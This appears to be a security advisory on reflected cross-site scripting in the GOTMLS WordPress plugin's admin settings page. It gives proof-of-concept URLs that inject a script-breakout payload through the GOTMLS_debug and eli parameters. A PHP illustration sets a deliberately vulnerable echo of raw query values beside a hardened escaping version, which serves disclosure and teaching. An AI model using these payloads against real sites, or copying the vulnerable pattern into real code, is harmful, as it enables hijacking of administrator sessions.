The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert(1)%3B>

Also possible with the $_GET['eli'] parameter:

http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=<%2Fscript><img+src+onerror%3Dalert(1)%3B>
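As an added illustration (not the plugin's own code), the output pattern this advisory describes next to the hardened form WordPress developers are expected to use; the function names, the settings-page handler and the assumption that one parameter is reflected inside an inline script block (suggested by the leading `</script>` in the PoC) are all hypothetical:

```php
<?php
// Added illustration (not the plugin's code): the pattern behind this advisory.
// Assumption: an admin-only settings page reflects the GOTMLS_debug and eli
// query parameters into the dashboard HTML and into an inline <script> block.

// --- Vulnerable pattern: raw $_GET echoed into HTML and script context -------
function gotmls_example_vulnerable_render() {
    $debug = isset( $_GET['GOTMLS_debug'] ) ? $_GET['GOTMLS_debug'] : '';
    $eli   = isset( $_GET['eli'] ) ? $_GET['eli'] : '';

    // HTML context: an "<img src onerror=...>" value is rendered as a live element.
    echo '<p>Debug level: ' . $debug . '</p>';

    // Script context: a value containing "</script>" terminates the block early,
    // so whatever follows is parsed as HTML. That is the break-out the PoC relies on.
    echo '<script>var gotmls_eli = "' . $eli . '";</script>';
}

// --- Hardened pattern: capability check, sanitise on input, escape per context
function gotmls_example_hardened_render() {
    // Only administrators should ever reach this settings page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'example-textdomain' ) );
    }

    // Sanitise on the way in: strips tags, NUL bytes and surrounding whitespace.
    $debug = isset( $_GET['GOTMLS_debug'] )
        ? sanitize_text_field( wp_unslash( $_GET['GOTMLS_debug'] ) ) : '';
    $eli = isset( $_GET['eli'] )
        ? sanitize_text_field( wp_unslash( $_GET['eli'] ) ) : '';

    // Escape on the way out, matching the output context:
    // HTML body -> esc_html(); HTML attribute value -> esc_attr().
    echo '<p>Debug level: ' . esc_html( $debug ) . '</p>';
    echo '<input type="hidden" name="eli" value="' . esc_attr( $eli ) . '">';

    // Inline JavaScript -> wp_json_encode(): emits a quoted JS string literal and,
    // with the JSON_HEX_* flags, hex-escapes < > & ' " so "</script>" cannot
    // close the block and the value cannot break out of the string.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    echo '<script>var gotmls_eli = ' . wp_json_encode( $eli, $flags ) . ';</script>';
}
```

Sanitising alone is not sufficient: `sanitize_text_field()` removes tags but does not make a value safe for every context, so each echo still needs the escape function that matches where the value lands.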